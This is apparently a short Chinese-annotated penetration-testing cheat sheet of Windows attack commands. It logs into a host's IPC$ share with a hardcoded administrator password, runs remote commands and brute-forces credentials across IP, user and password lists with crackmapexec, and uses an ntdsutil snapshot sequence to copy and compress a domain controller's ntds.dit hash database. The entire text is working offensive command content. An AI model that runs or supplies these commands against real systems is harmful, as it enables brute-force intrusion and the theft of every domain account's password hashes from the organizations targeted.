net use \\10.10.10.201\ipc$ P@ssw0rd /user:localhost\administrator     登录445端口

crackmapexec 10.10.10.201 -u Administrator -p P@ssw0rd -x "ipconfig /all" 
crackmapexec.exe ip.txt -u user.txt -p  pass.txt -t 3 -x "ipconfig /all" >>a.txt 爆破命令

域控制器抓取域成员hash（2008,2012，2016）
ntdsutil  snapshot  "list all" quit quit  //查看全部快照
ntdsutil  snapshot  "activate  instance  ntds" create quit quit  //创建快照
ntdsutil  snapshot  "list all" quit quit  //查看全部快照
ntdsutil  snapshot  "mount {d39bd9ed-5474-4929-8273-e8c82cc662af}" quit quit  //挂载快照为文件夹
copy C:\$SNAP_201706301256_VOLUMEC$\windows\ntds\ntds.dit  //拷贝快照文件夹中hash存储文件
ntdsutil  snapshot  "unmount {150a1e86-84f0-41c4-816c-13d03356de0d}" quit quit   //卸载快照
ntdsutil  snapshot  "delete {98eee20e-86ba-4ac2-acc4-f835d80d1d63}" quit quit    //删除快照
"C:\Program Files\7-Zip\7z.exe" a ntds.7z C:\windows\system32\ntds.dit   //压缩hash存储文件+
